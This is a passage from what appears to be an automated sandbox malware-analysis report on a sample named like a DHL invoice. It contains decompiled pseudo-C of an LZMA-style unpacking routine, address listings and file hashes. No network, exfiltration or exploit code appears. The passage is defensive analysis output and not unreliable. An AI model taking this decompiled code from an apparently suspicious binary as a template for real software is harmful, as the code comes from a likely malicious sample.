                                        												__edx =  *(__ebp - 8);
                                        												__cl =  *(__eax + __edx);
                                        												__eax =  *(__ebp - 0x14);
                                        												 *(__ebp - 0x5c) = __cl;
                                        												 *(__eax + __edx) = __cl;
                                        												__eax = __eax + 1;
                                        												__edx = 0;
                                        												_t275 = __eax %  *(__ebp - 0x74);
                                        												__eax = __eax /  *(__ebp - 0x74);
                                        												__edx = _t275;
                                        												__eax =  *(__ebp - 0x68);
                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        												_t284 = __ebp - 0x64;
                                        												 *_t284 =  *(__ebp - 0x64) - 1;
                                        												__eflags =  *_t284;
                                        												 *( *(__ebp - 0x68)) = __cl;
                                        												L80:
                                        												 *(__ebp - 0x14) = __edx;
                                        												goto L81;
                                        											case 0x1c:
                                        												while(1) {
                                        													L123:
                                        													__eflags =  *(__ebp - 0x64);
                                        													if( *(__ebp - 0x64) == 0) {
                                        														break;
                                        													}
                                        													__eax =  *(__ebp - 0x14);
                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        													__eflags = __eax -  *(__ebp - 0x74);
                                        													if(__eax >=  *(__ebp - 0x74)) {
                                        														__eax = __eax +  *(__ebp - 0x74);
                                        														__eflags = __eax;
                                        													}
                                        													__edx =  *(__ebp - 8);
                                        													__cl =  *(__eax + __edx);
                                        													__eax =  *(__ebp - 0x14);
                                        													 *(__ebp - 0x5c) = __cl;
                                        													 *(__eax + __edx) = __cl;
                                        													__eax = __eax + 1;
                                        													__edx = 0;
                                        													_t414 = __eax %  *(__ebp - 0x74);
                                        													__eax = __eax /  *(__ebp - 0x74);
                                        													__edx = _t414;
                                        													__eax =  *(__ebp - 0x68);
                                        													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                        													__eflags =  *(__ebp - 0x30);
                                        													 *( *(__ebp - 0x68)) = __cl;
                                        													 *(__ebp - 0x14) = _t414;
                                        													if( *(__ebp - 0x30) > 0) {
                                        														continue;
                                        													} else {
                                        														L81:
                                        														 *(__ebp - 0x88) = 2;
                                        														goto L1;
                                        													}
                                        												}
                                        												 *(__ebp - 0x88) = 0x1c;
                                        												goto L170;
                                        										}
                                        									}
                                        									L171:
                                        									_t535 = _t534 | 0xffffffff;
                                        									goto L172;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					goto L1;
                                        				}
                                        			}













                                        0x00000000
                                        0x00406a23
                                        0x00406a23
                                        0x00406a27
                                        0x00406a34
                                        0x00406a3e
                                        0x00000000
                                        0x00406a29
                                        0x00406a29
                                        0x00406a64
                                        0x00406a67
                                        0x00406a6a
                                        0x00406a6d
                                        0x00406a6d
                                        0x00406a70
                                        0x00406a77
                                        0x00406a7c
                                        0x0040695d
                                        0x00406960
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00406d23
                                        0x00406d27
                                        0x00406ed6
                                        0x00406eec
                                        0x00406ef4
                                        0x00406efb
                                        0x00406efd
                                        0x00406f04
                                        0x00406f08
                                        0x00406f08
                                        0x00406d33
                                        0x00406d3a
                                        0x00406d42
                                        0x00406d45
                                        0x00406d48
                                        0x00406d48
                                        0x00406d4e
                                        0x00406d4e
                                        0x004064ea
                                        0x004064ea
                                        0x004064ea
                                        0x004064f3
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00000000
                                        0x00406504
                                        0x00000000
                                        0x00000000
                                        0x0040650d
                                        0x00406510
                                        0x00406513
                                        0x00406517
                                        0x00000000
                                        0x00000000
                                        0x0040651d
                                        0x00406520
                                        0x00406522
                                        0x00406523
                                        0x00406526
                                        0x00406528
                                        0x00406529
                                        0x0040652b
                                        0x0040652e
                                        0x00406533
                                        0x00406538
                                        0x00406541
                                        0x00406554
                                        0x00406557
                                        0x00406563
                                        0x0040658b
                                        0x0040658d
                                        0x0040659b
                                        0x0040659b
                                        0x0040659f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040658f
                                        0x0040658f
                                        0x00406592
                                        0x00406593
                                        0x00406593
                                        0x00000000
                                        0x0040658f
                                        0x00406569
                                        0x0040656e
                                        0x0040656e
                                        0x00406577
                                        0x0040657f
                                        0x00406582
                                        0x00000000
                                        0x00406588
                                        0x00406588
                                        0x00000000
                                        0x00406588
                                        0x00000000
                                        0x004065a5
                                        0x004065a5
                                        0x004065a9
                                        0x00406e55
                                        0x00000000
                                        0x00406e55
                                        0x004065b2
                                        0x004065c2
                                        0x004065c5
                                        0x004065c8
                                        0x004065c8
                                        0x004065c8
                                        0x004065cb
                                        0x004065cf
                                        0x00000000
                                        0x00000000
                                        0x004065d1
                                        0x004065d7
                                        0x00406601
                                        0x00406607
                                        0x0040660e
                                        0x00000000
                                        0x0040660e
                                        0x004065dd
                                        0x004065e0
                                        0x004065e5
                                        0x004065e5
                                        0x004065f0
                                        0x004065f8
                                        0x004065fb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406640
                                        0x00406646
                                        0x00406649
                                        0x00406656
                                        0x0040665e
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00000000
                                        0x00406615
                                        0x00406615
                                        0x00406619
                                        0x00406e64
                                        0x00000000
                                        0x00406e64
                                        0x00406625
                                        0x00406630
                                        0x00406630
                                        0x00406630
                                        0x00406633
                                        0x00406636
                                        0x00406639
                                        0x0040663e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406666
                                        0x00406668
                                        0x0040666b
                                        0x004066dc
                                        0x004066df
                                        0x004066e2
                                        0x004066e9
                                        0x004066f3
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406cd2
                                        0x0040666d
                                        0x00406671
                                        0x00406674
                                        0x00406676
                                        0x00406679
                                        0x0040667c
                                        0x0040667e
                                        0x00406681
                                        0x00406683
                                        0x00406688
                                        0x0040668b
                                        0x0040668e
                                        0x00406692
                                        0x00406699
                                        0x0040669c
                                        0x004066a3
                                        0x004066a7
                                        0x004066af
                                        0x004066af
                                        0x004066af
                                        0x004066a9
                                        0x004066a9
                                        0x004066a9
                                        0x0040669e
                                        0x0040669e
                                        0x0040669e
                                        0x004066b3
                                        0x004066b6
                                        0x004066d4
                                        0x004066d6
                                        0x00000000
                                        0x004066b8
                                        0x004066b8
                                        0x004066bb
                                        0x004066be
                                        0x004066c1
                                        0x004066c3
                                        0x004066c3
                                        0x004066c3
                                        0x004066c6
                                        0x004066c9
                                        0x004066cb
                                        0x004066cc
                                        0x004066cf
                                        0x00000000
                                        0x004066cf
                                        0x00000000
                                        0x00406905
                                        0x00406909
                                        0x00406927
                                        0x0040692a
                                        0x00406931
                                        0x00406934
                                        0x00406937
                                        0x0040693a
                                        0x0040693d
                                        0x00406940
                                        0x00406942
                                        0x00406949
                                        0x0040694a
                                        0x0040694c
                                        0x0040694f
                                        0x00406952
                                        0x00406955
                                        0x00406955
                                        0x0040695a
                                        0x00000000
                                        0x0040695a
                                        0x0040690b
                                        0x0040690e
                                        0x00406911
                                        0x0040691b
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00000000
                                        0x0040696f
                                        0x00406973
                                        0x00406996
                                        0x00406999
                                        0x0040699c
                                        0x004069a6
                                        0x00406975
                                        0x00406975
                                        0x00406978
                                        0x0040697b
                                        0x0040697e
                                        0x0040698b
                                        0x0040698e
                                        0x0040698e
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00000000
                                        0x004069b2
                                        0x004069b6
                                        0x00000000
                                        0x00000000
                                        0x004069bc
                                        0x004069c0
                                        0x00000000
                                        0x00000000
                                        0x004069c6
                                        0x004069c8
                                        0x004069cc
                                        0x004069cc
                                        0x004069cf
                                        0x004069d3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406a4a
                                        0x00406a4e
                                        0x00406a55
                                        0x00406a58
                                        0x00406a5b
                                        0x00406a50
                                        0x00406a50
                                        0x00406a50
                                        0x00406a5e
                                        0x00406a61
                                        0x00000000
                                        0x00000000
                                        0x00406b0a
                                        0x00406b0a
                                        0x00406b0e
                                        0x00406eac
                                        0x00000000
                                        0x00406eac
                                        0x00406b14
                                        0x00406b17
                                        0x00406b1a
                                        0x00406b1e
                                        0x00406b21
                                        0x00406b27
                                        0x00406b29
                                        0x00406b29
                                        0x00406b29
                                        0x00406b2c
                                        0x00406b2f
                                        0x00000000
                                        0x00000000
                                        0x004066ff
                                        0x004066ff
                                        0x00406703
                                        0x00406e70
                                        0x00000000
                                        0x00406e70
                                        0x00406709
                                        0x0040670c
                                        0x0040670f
                                        0x00406713
                                        0x00406716
                                        0x0040671c
                                        0x0040671e
                                        0x0040671e
                                        0x0040671e
                                        0x00406721
                                        0x00406724
                                        0x00406724
                                        0x00406727
                                        0x0040672a
                                        0x00000000
                                        0x00000000
                                        0x00406730
                                        0x00406736
                                        0x00000000
                                        0x00000000
                                        0x0040673c
                                        0x0040673c
                                        0x00406740
                                        0x00406743
                                        0x00406746
                                        0x00406749
                                        0x0040674c
                                        0x0040674d
                                        0x00406750
                                        0x00406752
                                        0x00406758
                                        0x0040675b
                                        0x0040675e
                                        0x00406761
                                        0x00406764
                                        0x00406767
                                        0x0040676a
                                        0x00406786
                                        0x00406789
                                        0x0040678c
                                        0x0040678f
                                        0x00406796
                                        0x0040679a
                                        0x0040679c
                                        0x004067a0
                                        0x0040676c
                                        0x0040676c
                                        0x00406770
                                        0x00406778
                                        0x0040677d
                                        0x0040677f
                                        0x00406781
                                        0x00406781
                                        0x004067a3
                                        0x004067aa
                                        0x004067ad
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b8
                                        0x004067b8
                                        0x004067bc
                                        0x00406e7c
                                        0x00000000
                                        0x00406e7c
                                        0x004067c2
                                        0x004067c5
                                        0x004067c8
                                        0x004067cc
                                        0x004067cf
                                        0x004067d5
                                        0x004067d7
                                        0x004067d7
                                        0x004067d7
                                        0x004067da
                                        0x004067dd
                                        0x004067dd
                                        0x004067dd
                                        0x004067e3
                                        0x00000000
                                        0x00000000
                                        0x004067e5
                                        0x004067e8
                                        0x004067eb
                                        0x004067ee
                                        0x004067f1
                                        0x004067f4
                                        0x004067f7
                                        0x004067fa
                                        0x004067fd
                                        0x00406800
                                        0x00406803
                                        0x0040681b
                                        0x0040681e
                                        0x00406821
                                        0x00406824
                                        0x00406824
                                        0x00406827
                                        0x0040682b
                                        0x0040682d
                                        0x00406805
                                        0x00406805
                                        0x0040680d
                                        0x00406812
                                        0x00406814
                                        0x00406816
                                        0x00406816
                                        0x00406830
                                        0x00406837
                                        0x0040683a
                                        0x00000000
                                        0x0040683c
                                        0x00000000
                                        0x0040683c
                                        0x0040683a
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00000000
                                        0x00000000
                                        0x0040687c
                                        0x0040687c
                                        0x00406880
                                        0x00406e88
                                        0x00000000
                                        0x00406e88
                                        0x00406886
                                        0x00406889
                                        0x0040688c
                                        0x00406890
                                        0x00406893
                                        0x00406899
                                        0x0040689b
                                        0x0040689b
                                        0x0040689b
                                        0x0040689e
                                        0x004068a1
                                        0x004068a1
                                        0x004068a7
                                        0x00406845
                                        0x00406845
                                        0x00406848
                                        0x00000000
                                        0x00406848
                                        0x004068a9
                                        0x004068a9
                                        0x004068ac
                                        0x004068af
                                        0x004068b2
                                        0x004068b5
                                        0x004068b8
                                        0x004068bb
                                        0x004068be
                                        0x004068c1
                                        0x004068c4
                                        0x004068c7
                                        0x004068df
                                        0x004068e2
                                        0x004068e5
                                        0x004068e8
                                        0x004068e8
                                        0x004068eb
                                        0x004068ef
                                        0x004068f1
                                        0x004068c9
                                        0x004068c9
                                        0x004068d1
                                        0x004068d6
                                        0x004068d8
                                        0x004068da
                                        0x004068da
                                        0x004068f4
                                        0x004068fb
                                        0x004068fe
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406b8d
                                        0x00406b8d
                                        0x00406b91
                                        0x00406eb8
                                        0x00000000
                                        0x00406eb8
                                        0x00406b97
                                        0x00406b9a
                                        0x00406b9d
                                        0x00406ba1
                                        0x00406ba4
                                        0x00406baa
                                        0x00406bac
                                        0x00406bac
                                        0x00406bac
                                        0x00406baf
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406c9c
                                        0x00406ca0
                                        0x00406cc2
                                        0x00406cc5
                                        0x00406ccf
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406ca2
                                        0x00406ca5
                                        0x00406ca9
                                        0x00406cac
                                        0x00406cac
                                        0x00406caf
                                        0x00000000
                                        0x00000000
                                        0x00406d59
                                        0x00406d5d
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d82
                                        0x00406d89
                                        0x00406d90
                                        0x00406d90
                                        0x00000000
                                        0x00406d90
                                        0x00406d5f
                                        0x00406d62
                                        0x00406d65
                                        0x00406d68
                                        0x00406d6f
                                        0x00406cb3
                                        0x00406cb3
                                        0x00406cb6
                                        0x00000000
                                        0x00000000
                                        0x00406e4a
                                        0x00406e4d
                                        0x00406d4e
                                        0x00000000
                                        0x00000000
                                        0x00406a84
                                        0x00406a86
                                        0x00406a8d
                                        0x00406a8e
                                        0x00406a90
                                        0x00406a93
                                        0x00000000
                                        0x00000000
                                        0x00406a9b
                                        0x00406a9e
                                        0x00406aa1
                                        0x00406aa3
                                        0x00406aa5
                                        0x00406aa5
                                        0x00406aa6
                                        0x00406aa9
                                        0x00406ab0
                                        0x00406ab3
                                        0x00406ac1
                                        0x00000000
                                        0x00000000
                                        0x00406d97
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00000000
                                        0x00000000
                                        0x00406da6
                                        0x00406da6
                                        0x00406daa
                                        0x00406ee2
                                        0x00000000
                                        0x00406ee2
                                        0x00406db0
                                        0x00406db3
                                        0x00406db6
                                        0x00406dba
                                        0x00406dbd
                                        0x00406dc3
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc8
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dce
                                        0x00406dce
                                        0x00406dd2
                                        0x00406e32
                                        0x00406e35
                                        0x00406e3a
                                        0x00406e3b
                                        0x00406e3d
                                        0x00406e3f
                                        0x00406e42
                                        0x00406d4e
                                        0x00406d4e
                                        0x00000000
                                        0x00406d54
                                        0x00406d4e
                                        0x00406dd4
                                        0x00406dda
                                        0x00406ddd
                                        0x00406de0
                                        0x00406de3
                                        0x00406de6
                                        0x00406de9
                                        0x00406dec
                                        0x00406def
                                        0x00406df2
                                        0x00406df5
                                        0x00406e0e
                                        0x00406e11
                                        0x00406e14
                                        0x00406e17
                                        0x00406e1b
                                        0x00406e1d
                                        0x00406e1d
                                        0x00406e1e
                                        0x00406e21
                                        0x00406df7
                                        0x00406df7
                                        0x00406dff
                                        0x00406e04
                                        0x00406e06
                                        0x00406e09
                                        0x00406e09
                                        0x00406e24
                                        0x00406e2b
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406ac9
                                        0x00406acc
                                        0x00406b02
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c35
                                        0x00406c35
                                        0x00406c38
                                        0x00406c3a
                                        0x00406ec4
                                        0x00000000
                                        0x00406ec4
                                        0x00406c40
                                        0x00406c43
                                        0x00000000
                                        0x00000000
                                        0x00406c49
                                        0x00406c4d
                                        0x00406c50
                                        0x00406c50
                                        0x00406c50
                                        0x00000000
                                        0x00406c50
                                        0x00406ace
                                        0x00406ad0
                                        0x00406ad2
                                        0x00406ad4
                                        0x00406ad7
                                        0x00406ad8
                                        0x00406ada
                                        0x00406adc
                                        0x00406adf
                                        0x00406ae2
                                        0x00406af8
                                        0x00406afd
                                        0x00406b35
                                        0x00406b35
                                        0x00406b39
                                        0x00406b65
                                        0x00406b67
                                        0x00406b6e
                                        0x00406b71
                                        0x00406b74
                                        0x00406b74
                                        0x00406b79
                                        0x00406b79
                                        0x00406b7b
                                        0x00406b7e
                                        0x00406b85
                                        0x00406b88
                                        0x00406bb5
                                        0x00406bb5
                                        0x00406bb8
                                        0x00406bbb
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00000000
                                        0x00406c2f
                                        0x00406bbd
                                        0x00406bc3
                                        0x00406bc6
                                        0x00406bc9
                                        0x00406bcc
                                        0x00406bcf
                                        0x00406bd2
                                        0x00406bd5
                                        0x00406bd8
                                        0x00406bdb
                                        0x00406bde
                                        0x00406bf7
                                        0x00406bf9
                                        0x00406bfc
                                        0x00406bfd
                                        0x00406c00
                                        0x00406c02
                                        0x00406c05
                                        0x00406c07
                                        0x00406c09
                                        0x00406c0c
                                        0x00406c0e
                                        0x00406c11
                                        0x00406c15
                                        0x00406c17
                                        0x00406c17
                                        0x00406c18
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406be0
                                        0x00406be0
                                        0x00406be8
                                        0x00406bed
                                        0x00406bef
                                        0x00406bf2
                                        0x00406bf2
                                        0x00406c21
                                        0x00406c28
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00000000
                                        0x00406c2a
                                        0x00000000
                                        0x00406c2a
                                        0x00406c28
                                        0x00406b3b
                                        0x00406b3e
                                        0x00406b40
                                        0x00406b43
                                        0x00406b46
                                        0x00406b49
                                        0x00406b4b
                                        0x00406b4e
                                        0x00406b51
                                        0x00406b51
                                        0x00406b54
                                        0x00406b54
                                        0x00406b57
                                        0x00406b5e
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00000000
                                        0x00406b60
                                        0x00000000
                                        0x00406b60
                                        0x00406b5e
                                        0x00406ae4
                                        0x00406ae7
                                        0x00406ae9
                                        0x00406aec
                                        0x00000000
                                        0x00000000
                                        0x0040684b
                                        0x0040684b
                                        0x0040684f
                                        0x00406e94
                                        0x00000000
                                        0x00406e94
                                        0x00406855
                                        0x00406858
                                        0x0040685b
                                        0x0040685e
                                        0x00406861
                                        0x00406864
                                        0x00406867
                                        0x00406869
                                        0x0040686c
                                        0x0040686f
                                        0x00406872
                                        0x00406874
                                        0x00406874
                                        0x00406874
                                        0x00000000
                                        0x00000000
                                        0x004069d6
                                        0x004069d6
                                        0x004069da
                                        0x00406ea0
                                        0x00000000
                                        0x00406ea0
                                        0x004069e0
                                        0x004069e3
                                        0x004069e6
                                        0x004069e9
                                        0x004069eb
                                        0x004069eb
                                        0x004069eb
                                        0x004069ee
                                        0x004069f1
                                        0x004069f4
                                        0x004069f7
                                        0x004069fa
                                        0x004069fd
                                        0x004069fe
                                        0x00406a00
                                        0x00406a00
                                        0x00406a00
                                        0x00406a03
                                        0x00406a06
                                        0x00406a09
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0f
                                        0x00406a11
                                        0x00406a11
                                        0x00000000
                                        0x00000000
                                        0x00406c53
                                        0x00406c53
                                        0x00406c53
                                        0x00406c57
                                        0x00000000
                                        0x00000000
                                        0x00406c5d
                                        0x00406c60
                                        0x00406c63
                                        0x00406c66
                                        0x00406c68
                                        0x00406c68
                                        0x00406c68
                                        0x00406c6b
                                        0x00406c6e
                                        0x00406c71
                                        0x00406c74
                                        0x00406c77
                                        0x00406c7a
                                        0x00406c7b
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c80
                                        0x00406c83
                                        0x00406c86
                                        0x00406c89
                                        0x00406c8c
                                        0x00406c90
                                        0x00406c92
                                        0x00406c95
                                        0x00000000
                                        0x00406c97
                                        0x00406a14
                                        0x00406a14
                                        0x00000000
                                        0x00406a14
                                        0x00406c95
                                        0x00406eca
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00406f01
                                        0x00406f01
                                        0x00000000
                                        0x00406f01
                                        0x00406d4e
                                        0x00406cd5
                                        0x00406cd2
                                        0x00000000
                                        0x00406a27

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                        • Instruction ID: 3517892101dd69bd75e64738494877d03a8317e446f0652336487a17687a2cae
                                        • Opcode Fuzzy Hash: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                        • Instruction Fuzzy Hash: 53712571E04229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281D7789996DF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E0040696F() {
                                        				unsigned short _t531;
                                        				signed int _t532;
                                        				void _t533;
                                        				signed int _t534;
                                        				signed int _t535;
                                        				signed int _t565;
                                        				signed int _t568;
                                        				signed int _t589;
                                        				signed int* _t606;
                                        				void* _t613;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					if( *(_t613 - 0x40) != 0) {
                                        						 *(_t613 - 0x84) = 0xa;
                                        						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                        					} else {
                                        						 *(__ebp - 0x84) = 9;
                                        						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                        					}
                                        					while(1) {
                                        						 *(_t613 - 0x54) = _t606;
                                        						while(1) {
                                        							L133:
                                        							_t531 =  *_t606;
                                        							_t589 = _t531 & 0x0000ffff;
                                        							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                        							if( *(_t613 - 0xc) >= _t565) {
                                        								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                        								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                        								 *(_t613 - 0x40) = 1;
                                        								_t532 = _t531 - (_t531 >> 5);
                                        								 *_t606 = _t532;
                                        							} else {
                                        								 *(_t613 - 0x10) = _t565;
                                        								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                        								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                        							}
                                        							if( *(_t613 - 0x10) >= 0x1000000) {
                                        								goto L139;
                                        							}
                                        							L137:
                                        							if( *(_t613 - 0x6c) == 0) {
                                        								 *(_t613 - 0x88) = 5;
                                        								L170:
                                        								_t568 = 0x22;
                                        								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                        								_t535 = 0;
                                        								L172:
                                        								return _t535;
                                        							}
                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                        							L139:
                                        							_t533 =  *(_t613 - 0x84);
                                        							while(1) {
                                        								 *(_t613 - 0x88) = _t533;
                                        								while(1) {
                                        									L1:
                                        									_t534 =  *(_t613 - 0x88);
                                        									if(_t534 > 0x1c) {
                                        										break;
                                        									}
                                        									switch( *((intOrPtr*)(_t534 * 4 +  &M00406F09))) {
                                        										case 0:
                                        											if( *(_t613 - 0x6c) == 0) {
                                        												goto L170;
                                        											}
                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        											_t534 =  *( *(_t613 - 0x70));
                                        											if(_t534 > 0xe1) {
                                        												goto L171;
                                        											}
                                        											_t538 = _t534 & 0x000000ff;
                                        											_push(0x2d);
                                        											asm("cdq");
                                        											_pop(_t570);
                                        											_push(9);
                                        											_pop(_t571);
                                        											_t609 = _t538 / _t570;
                                        											_t540 = _t538 % _t570 & 0x000000ff;
                                        											asm("cdq");
                                        											_t604 = _t540 % _t571 & 0x000000ff;
                                        											 *(_t613 - 0x3c) = _t604;
                                        											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                        											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                        											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                        											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                        												L10:
                                        												if(_t612 == 0) {
                                        													L12:
                                        													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                        													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                        													goto L15;
                                        												} else {
                                        													goto L11;
                                        												}
                                        												do {
                                        													L11:
                                        													_t612 = _t612 - 1;
                                        													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                        												} while (_t612 != 0);
                                        												goto L12;
                                        											}
                                        											if( *(_t613 - 4) != 0) {
                                        												GlobalFree( *(_t613 - 4)); // executed
                                        											}
                                        											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                        											 *(_t613 - 4) = _t534;
                                        											if(_t534 == 0) {
                                        												goto L171;
                                        											} else {
                                        												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                        												goto L10;
                                        											}
                                        										case 1:
                                        											L13:
                                        											__eflags =  *(_t613 - 0x6c);
                                        											if( *(_t613 - 0x6c) == 0) {
                                        												 *(_t613 - 0x88) = 1;
                                        												goto L170;
                                        											}
                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                        											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                        											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                        											_t45 = _t613 - 0x48;
                                        											 *_t45 =  *(_t613 - 0x48) + 1;
                                        											__eflags =  *_t45;
                                        											L15:
                                        											if( *(_t613 - 0x48) < 4) {
                                        												goto L13;
                                        											}
                                        											_t546 =  *(_t613 - 0x40);
                                        											if(_t546 ==  *(_t613 - 0x74)) {
                                        												L20:
                                        												 *(_t613 - 0x48) = 5;
                                        												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                        												goto L23;
                                        											}
                                        											 *(_t613 - 0x74) = _t546;
                                        											if( *(_t613 - 8) != 0) {
                                        												GlobalFree( *(_t613 - 8)); // executed
                                        											}
                                        											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                        											 *(_t613 - 8) = _t534;
                                        											if(_t534 == 0) {
                                        												goto L171;
                                        											} else {
                                        												goto L20;
                                        											}
                                        										case 2:
                                        											L24:
                                        											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                        											 *(_t613 - 0x84) = 6;
                                        											 *(_t613 - 0x4c) = _t553;
                                        											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                        											 *(_t613 - 0x54) = _t606;
                                        											goto L133;
                                        										case 3:
                                        											L21:
                                        											__eflags =  *(_t613 - 0x6c);
